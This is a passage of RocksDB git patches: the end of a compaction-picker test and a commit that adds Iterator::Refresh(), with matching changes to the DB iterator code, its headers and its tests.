vstorage_->SetNextCompactionIndex(start_level_, cmp_idx); return start_level_inputs_.size() > 0; } diff --git a/db/compaction_picker_test.cc b/db/compaction_picker_test.cc index 1ced12cfd5d..c2bff0024f4 100644 --- a/db/compaction_picker_test.cc +++ b/db/compaction_picker_test.cc @@ -1390,6 +1390,49 @@ TEST_F(CompactionPickerTest, IsTrivialMoveOff) { ASSERT_FALSE(compaction->IsTrivialMove()); } +TEST_F(CompactionPickerTest, CacheNextCompactionIndex) { + NewVersionStorage(6, kCompactionStyleLevel); + mutable_cf_options_.max_compaction_bytes = 100000000000u; + + Add(1 /* level */, 1U /* file_number */, "100" /* smallest */, + "149" /* largest */, 1000000000U /* file_size */); + file_map_[1U].first->being_compacted = true; + Add(1 /* level */, 2U /* file_number */, "150" /* smallest */, + "199" /* largest */, 900000000U /* file_size */); + Add(1 /* level */, 3U /* file_number */, "200" /* smallest */, + "249" /* largest */, 800000000U /* file_size */); + Add(1 /* level */, 4U /* file_number */, "250" /* smallest */, + "299" /* largest */, 700000000U /* file_size */); + Add(2 /* level */, 5U /* file_number */, "150" /* smallest */, + "199" /* largest */, 1U /* file_size */); + file_map_[5U].first->being_compacted = true; + + UpdateVersionStorageInfo(); + + std::unique_ptr<Compaction> compaction(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); + ASSERT_EQ(1U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(0U, compaction->num_input_files(1)); + ASSERT_EQ(3U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(2, vstorage_->NextCompactionIndex(1 /* level */)); + + compaction.reset(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() != nullptr); +
ASSERT_EQ(1U, compaction->num_input_levels()); + ASSERT_EQ(1U, compaction->num_input_files(0)); + ASSERT_EQ(0U, compaction->num_input_files(1)); + ASSERT_EQ(4U, compaction->input(0, 0)->fd.GetNumber()); + ASSERT_EQ(3, vstorage_->NextCompactionIndex(1 /* level */)); + + compaction.reset(level_compaction_picker.PickCompaction( + cf_name_, mutable_cf_options_, vstorage_.get(), &log_buffer_)); + ASSERT_TRUE(compaction.get() == nullptr); + ASSERT_EQ(4, vstorage_->NextCompactionIndex(1 /* level */)); +} + } // namespace rocksdb int main(int argc, char** argv) { From e67b35c07625015e6510af3e655ff8f2365aa484 Mon Sep 17 00:00:00 2001 From: Siying Dong Date: Mon, 24 Jul 2017 10:28:17 -0700 Subject: [PATCH 028/205] Add Iterator::Refresh() Summary: Add and implement Iterator::Refresh(). When this function is called, if the super version hasn't changed, we update the sequence number of the iterator to the latest one and invalidate the iterator. If the super version has changed, we recreate the whole iterator. This can help users reuse the iterator more easily. Closes https://github.com/facebook/rocksdb/pull/2621 Differential Revision: D5464500 Pulled By: siying fbshipit-source-id: f548bd35e85c1efca2ea69273802f6704eba6ba9 --- HISTORY.md | 4 + db/db_impl.cc | 18 +-- db/db_impl.h | 13 +- db/db_impl_readonly.cc | 4 +- db/db_iter.cc | 96 +++++++++---- db/db_iter.h | 35 +++-- db/db_iter_test.cc | 138 +++++++++---------- db/db_iterator_test.cc | 59 ++++++++ include/rocksdb/iterator.h | 7 + utilities/date_tiered/date_tiered_db_impl.cc | 4 +- 10 files changed, 250 insertions(+), 128 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 3057684a059..7d98443720a 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,8 @@ # Rocksdb Change Log +## Unreleased +### New Features +* Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. + ## 5.7.0 (07/13/2017) ### Public API Change * DB property "rocksdb.sstables" now prints keys in hex form. diff --git a/db/db_impl.cc b/db/db_impl.cc index f770b51ae7f..bfe38302fc6 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -1402,8 +1402,7 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, return NewDBIterator( env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter, kMaxSequenceNumber, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + sv->mutable_cf_options.max_sequential_skip_in_iterations); #endif } else { SequenceNumber latest_snapshot = versions_->LastSequence(); @@ -1458,9 +1457,10 @@ Iterator* DBImpl::NewIterator(const ReadOptions& read_options, // likely that any iterator pointer is close to the iterator it points to so // that they are likely to be in the same cache line and/or page. ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), snapshot, + env_, read_options, *cfd->ioptions(), snapshot, sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + sv->version_number, + ((read_options.snapshot != nullptr) ?
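/* An illustrative usage sketch of the new API, not part of this patch:
   assuming `db` is an open rocksdb::DB* with this change applied, Refresh()
   lets a long-lived iterator observe newer writes without paying the full
   cost of another NewIterator() call:

     std::unique_ptr<rocksdb::Iterator> it(
         db->NewIterator(rocksdb::ReadOptions()));
     it->SeekToFirst();                  // sees data as of creation time
     // ... more writes are applied to the DB ...
     rocksdb::Status s = it->Refresh();  // move to the latest sequence number
     if (s.ok()) {
       it->SeekToFirst();                // Refresh() invalidates the position,
     }                                   // so the iterator must seek again

   As the surrounding diff shows, a DBImpl pointer is only stored when
   read_options.snapshot is null, so calling Refresh() on an iterator pinned
   to a user-supplied snapshot returns Status::NotSupported(). */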
nullptr : this), cfd); InternalIterator* internal_iter = NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), @@ -1511,8 +1511,7 @@ Status DBImpl::NewIterators( iterators->push_back(NewDBIterator( env_, read_options, *cfd->ioptions(), cfd->user_comparator(), iter, kMaxSequenceNumber, - sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number)); + sv->mutable_cf_options.max_sequential_skip_in_iterations)); } #endif } else { @@ -1530,9 +1529,10 @@ Status DBImpl::NewIterators( : latest_snapshot; ArenaWrappedDBIter* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), - snapshot, sv->mutable_cf_options.max_sequential_skip_in_iterations, - sv->version_number); + env_, read_options, *cfd->ioptions(), snapshot, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + sv->version_number, + ((read_options.snapshot != nullptr) ? nullptr : this), cfd); InternalIterator* internal_iter = NewInternalIterator(read_options, cfd, sv, db_iter->GetArena(), db_iter->GetRangeDelAggregator()); diff --git a/db/db_impl.h b/db/db_impl.h index bc2072d7e96..543d64ec800 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -494,6 +494,12 @@ class DBImpl : public DB { const WriteController& write_controller() { return write_controller_; } + InternalIterator* NewInternalIterator(const ReadOptions&, + ColumnFamilyData* cfd, + SuperVersion* super_version, + Arena* arena, + RangeDelAggregator* range_del_agg); + // hollow transactions shell used for recovery. // these will then be passed to TransactionDB so that // locks can be reacquired before writing can resume. @@ -552,6 +558,7 @@ class DBImpl : public DB { void AddToLogsToFreeQueue(log::Writer* log_writer) { logs_to_free_queue_.push_back(log_writer); } + InstrumentedMutex* mutex() { return &mutex_; } Status NewDB(); @@ -566,12 +573,6 @@ class DBImpl : public DB { std::unordered_map recovered_transactions_; - InternalIterator* NewInternalIterator(const ReadOptions&, - ColumnFamilyData* cfd, - SuperVersion* super_version, - Arena* arena, - RangeDelAggregator* range_del_agg); - // Except in DB::Open(), WriteOptionsFile can only be called when: // Persist options to options file. // If need_mutex_lock = false, the method will lock DB mutex. diff --git a/db/db_impl_readonly.cc b/db/db_impl_readonly.cc index d4fe7e702f8..d69eecb988f 100644 --- a/db/db_impl_readonly.cc +++ b/db/db_impl_readonly.cc @@ -58,7 +58,7 @@ Iterator* DBImplReadOnly::NewIterator(const ReadOptions& read_options, SuperVersion* super_version = cfd->GetSuperVersion()->Ref(); SequenceNumber latest_snapshot = versions_->LastSequence(); auto db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), + env_, read_options, *cfd->ioptions(), (read_options.snapshot != nullptr ? reinterpret_cast(read_options.snapshot) ->number_ @@ -87,7 +87,7 @@ Status DBImplReadOnly::NewIterators( auto* cfd = reinterpret_cast(cfh)->cfd(); auto* sv = cfd->GetSuperVersion()->Ref(); auto* db_iter = NewArenaWrappedDbIterator( - env_, read_options, *cfd->ioptions(), cfd->user_comparator(), + env_, read_options, *cfd->ioptions(), (read_options.snapshot != nullptr ? 
reinterpret_cast(read_options.snapshot) ->number_ diff --git a/db/db_iter.cc b/db/db_iter.cc index 7a22f573f30..801b1102f04 100644 --- a/db/db_iter.cc +++ b/db/db_iter.cc @@ -101,12 +101,12 @@ class DBIter: public Iterator { uint64_t bytes_read_; }; - DBIter(Env* env, const ReadOptions& read_options, + DBIter(Env* _env, const ReadOptions& read_options, const ImmutableCFOptions& cf_options, const Comparator* cmp, InternalIterator* iter, SequenceNumber s, bool arena_mode, - uint64_t max_sequential_skip_in_iterations, uint64_t version_number) + uint64_t max_sequential_skip_in_iterations) : arena_mode_(arena_mode), - env_(env), + env_(_env), logger_(cf_options.info_log), user_comparator_(cmp), merge_operator_(cf_options.merge_operator), @@ -116,7 +116,6 @@ class DBIter: public Iterator { valid_(false), current_entry_is_merged_(false), statistics_(cf_options.statistics), - version_number_(version_number), iterate_upper_bound_(read_options.iterate_upper_bound), prefix_same_as_start_(read_options.prefix_same_as_start), pin_thru_lifetime_(read_options.pin_data), @@ -188,10 +187,7 @@ class DBIter: public Iterator { } if (prop_name == "rocksdb.iterator.super-version-number") { // First try to pass the value returned from inner iterator. - if (!iter_->GetProperty(prop_name, prop).ok()) { - *prop = ToString(version_number_); - } - return Status::OK(); + return iter_->GetProperty(prop_name, prop); } else if (prop_name == "rocksdb.iterator.is-key-pinned") { if (valid_) { *prop = (pin_thru_lifetime_ && saved_key_.IsKeyPinned()) ? "1" : "0"; @@ -209,6 +205,9 @@ class DBIter: public Iterator { virtual void SeekForPrev(const Slice& target) override; virtual void SeekToFirst() override; virtual void SeekToLast() override; + Env* env() { return env_; } + void set_sequence(uint64_t s) { sequence_ = s; } + void set_valid(bool v) { valid_ = v; } private: void ReverseToForward(); @@ -260,7 +259,7 @@ class DBIter: public Iterator { const Comparator* const user_comparator_; const MergeOperator* const merge_operator_; InternalIterator* iter_; - SequenceNumber const sequence_; + SequenceNumber sequence_; Status status_; IterKey saved_key_; @@ -274,7 +273,6 @@ class DBIter: public Iterator { uint64_t max_skip_; uint64_t max_skippable_internal_keys_; uint64_t num_internal_keys_skipped_; - uint64_t version_number_; const Slice* iterate_upper_bound_; IterKey prefix_start_buf_; Slice prefix_start_key_; @@ -1157,18 +1155,15 @@ Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number) { - DBIter* db_iter = new DBIter( - env, read_options, cf_options, user_key_comparator, internal_iter, - sequence, false, max_sequential_skip_in_iterations, version_number); + uint64_t max_sequential_skip_in_iterations) { + DBIter* db_iter = new DBIter(env, read_options, cf_options, + user_key_comparator, internal_iter, sequence, + false, max_sequential_skip_in_iterations); return db_iter; } ArenaWrappedDBIter::~ArenaWrappedDBIter() { db_iter_->~DBIter(); } -void ArenaWrappedDBIter::SetDBIter(DBIter* iter) { db_iter_ = iter; } - RangeDelAggregator* ArenaWrappedDBIter::GetRangeDelAggregator() { return db_iter_->GetRangeDelAggregator(); } @@ -1193,26 +1188,67 @@ inline Slice ArenaWrappedDBIter::value() const { return db_iter_->value(); } inline Status ArenaWrappedDBIter::status() const { return db_iter_->status(); } inline Status 
ArenaWrappedDBIter::GetProperty(std::string prop_name, std::string* prop) { + if (prop_name == "rocksdb.iterator.super-version-number") { + // First try to pass the value returned from inner iterator. + if (!db_iter_->GetProperty(prop_name, prop).ok()) { + *prop = ToString(sv_number_); + } + return Status::OK(); + } return db_iter_->GetProperty(prop_name, prop); } -void ArenaWrappedDBIter::RegisterCleanup(CleanupFunction function, void* arg1, - void* arg2) { - db_iter_->RegisterCleanup(function, arg1, arg2); + +void ArenaWrappedDBIter::Init(Env* env, const ReadOptions& read_options, + const ImmutableCFOptions& cf_options, + const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iteration, + uint64_t version_number) { + auto mem = arena_.AllocateAligned(sizeof(DBIter)); + db_iter_ = new (mem) + DBIter(env, read_options, cf_options, cf_options.user_comparator, nullptr, + sequence, true, max_sequential_skip_in_iteration); + sv_number_ = version_number; +} + +Status ArenaWrappedDBIter::Refresh() { + if (cfd_ == nullptr || db_impl_ == nullptr) { + return Status::NotSupported("Creating renew iterator is not allowed."); + } + assert(db_iter_ != nullptr); + SequenceNumber latest_seq = db_impl_->GetLatestSequenceNumber(); + uint64_t cur_sv_number = cfd_->GetSuperVersionNumber(); + if (sv_number_ != cur_sv_number) { + Env* env = db_iter_->env(); + db_iter_->~DBIter(); + arena_.~Arena(); + new (&arena_) Arena(); + + SuperVersion* sv = cfd_->GetReferencedSuperVersion(db_impl_->mutex()); + Init(env, read_options_, *(cfd_->ioptions()), latest_seq, + sv->mutable_cf_options.max_sequential_skip_in_iterations, + cur_sv_number); + + InternalIterator* internal_iter = db_impl_->NewInternalIterator( + read_options_, cfd_, sv, &arena_, db_iter_->GetRangeDelAggregator()); + SetIterUnderDBIter(internal_iter); + } else { + db_iter_->set_sequence(latest_seq); + db_iter_->set_valid(false); + } + return Status::OK(); +} ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, - const ImmutableCFOptions& cf_options, const Comparator* user_key_comparator, - const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, - uint64_t version_number) { + const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + DBImpl* db_impl, ColumnFamilyData* cfd) { ArenaWrappedDBIter* iter = new ArenaWrappedDBIter(); - Arena* arena = iter->GetArena(); - auto mem = arena->AllocateAligned(sizeof(DBIter)); - DBIter* db_iter = new (mem) - DBIter(env, read_options, cf_options, user_key_comparator, nullptr, - sequence, true, max_sequential_skip_in_iterations, version_number); - - iter->SetDBIter(db_iter); + iter->Init(env, read_options, cf_options, sequence, + max_sequential_skip_in_iterations, version_number); + if (db_impl != nullptr && cfd != nullptr) { + iter->StoreRefreshInfo(read_options, db_impl, cfd); + } return iter; } diff --git a/db/db_iter.h b/db/db_iter.h index 83352644059..ea98ff4332a 100644 --- a/db/db_iter.h +++ b/db/db_iter.h @@ -10,6 +10,7 @@ #pragma once #include <stdint.h> #include <string> +#include "db/db_impl.h" #include "db/dbformat.h" #include "db/range_del_aggregator.h" #include "options/cf_options.h" @@ -32,8 +33,7 @@ extern Iterator* NewDBIterator(Env* env, const ReadOptions& read_options, const Comparator* user_key_comparator, InternalIterator* internal_iter, const SequenceNumber& sequence, - uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + uint64_t
max_sequential_skip_in_iterations); // A wrapper iterator which wraps DB Iterator and the arena, with which the DB // iterator is supposed to be allocated. This class is used as an entry point of @@ -49,10 +49,6 @@ class ArenaWrappedDBIter : public Iterator { virtual Arena* GetArena() { return &arena_; } virtual RangeDelAggregator* GetRangeDelAggregator(); - // Set the DB Iterator to be wrapped - - virtual void SetDBIter(DBIter* iter); - // Set the internal iterator wrapped inside the DB Iterator. Usually it is // a merging iterator. virtual void SetIterUnderDBIter(InternalIterator* iter); @@ -66,20 +62,39 @@ class ArenaWrappedDBIter : public Iterator { virtual Slice key() const override; virtual Slice value() const override; virtual Status status() const override; + virtual Status Refresh() override; - void RegisterCleanup(CleanupFunction function, void* arg1, void* arg2); virtual Status GetProperty(std::string prop_name, std::string* prop) override; + void Init(Env* env, const ReadOptions& read_options, + const ImmutableCFOptions& cf_options, + const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, + uint64_t version_number); + + void StoreRefreshInfo(const ReadOptions& read_options, DBImpl* db_impl, + ColumnFamilyData* cfd) { + read_options_ = read_options; + db_impl_ = db_impl; + cfd_ = cfd; + } + private: DBIter* db_iter_; Arena arena_; + uint64_t sv_number_; + ColumnFamilyData* cfd_ = nullptr; + DBImpl* db_impl_ = nullptr; + ReadOptions read_options_; }; // Generate the arena wrapped iterator class. +// `db_impl` and `cfd` are used for renewal. If left null, renewal will not +// be supported. extern ArenaWrappedDBIter* NewArenaWrappedDbIterator( Env* env, const ReadOptions& read_options, - const ImmutableCFOptions& cf_options, const Comparator* user_key_comparator, - const SequenceNumber& sequence, uint64_t max_sequential_skip_in_iterations, - uint64_t version_number); + const ImmutableCFOptions& cf_options, const SequenceNumber& sequence, + uint64_t max_sequential_skip_in_iterations, uint64_t version_number, + DBImpl* db_impl = nullptr, ColumnFamilyData* cfd = nullptr); } // namespace rocksdb diff --git a/db/db_iter_test.cc b/db/db_iter_test.cc index 1b7c13b06f3..6db3b4a9bbb 100644 --- a/db/db_iter_test.cc +++ b/db/db_iter_test.cc @@ -193,7 +193,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -225,7 +225,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -251,7 +251,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -283,7 +283,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10,
options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -318,7 +318,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -347,7 +347,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); SetPerfLevel(kEnableCount); ASSERT_TRUE(GetPerfLevel() == kEnableCount); @@ -384,7 +384,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -409,7 +409,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -431,7 +431,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -466,7 +466,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); SetPerfLevel(kEnableCount); ASSERT_TRUE(GetPerfLevel() == kEnableCount); @@ -495,7 +495,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -537,7 +537,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -568,7 +568,7 @@ TEST_F(DBIteratorTest, DBIteratorPrevNext) { ReadOptions ro; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -597,7 +597,7 @@ TEST_F(DBIteratorTest, DBIteratorEmpty) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); } @@ -608,7 +608,7 @@ TEST_F(DBIteratorTest, DBIteratorEmpty) { 
std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(!db_iter->Valid()); } @@ -630,7 +630,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkipCountSkips) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -673,7 +673,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { options.statistics = rocksdb::CreateDBStatistics(); std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -708,7 +708,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -736,7 +736,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 202, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -768,7 +768,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { internal_iter->Finish(); std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); @@ -784,7 +784,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { internal_iter->Finish(); std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 200, options.max_sequential_skip_in_iterations, 0)); + 200, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -818,7 +818,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -852,7 +852,7 @@ TEST_F(DBIteratorTest, DBIteratorUseSkip) { std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, i + 2, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -900,7 +900,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 0; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -946,7 +946,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( 
NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -990,7 +990,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1028,7 +1028,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1063,7 +1063,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1093,7 +1093,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1130,7 +1130,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = 2; std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1167,7 +1167,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = i; std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1220,7 +1220,7 @@ TEST_F(DBIteratorTest, DBIteratorSkipInternalKeys) { ro.max_skippable_internal_keys = i; std::unique_ptr db_iter(NewDBIterator( env_, ro, cf_options, BytewiseComparator(), internal_iter, 2 * i + 1, - options.max_sequential_skip_in_iterations, 0)); + options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); @@ -1258,7 +1258,7 @@ TEST_F(DBIteratorTest, DBIterator1) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 1, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1285,7 +1285,7 @@ TEST_F(DBIteratorTest, DBIterator2) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 0, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 0, options.max_sequential_skip_in_iterations)); 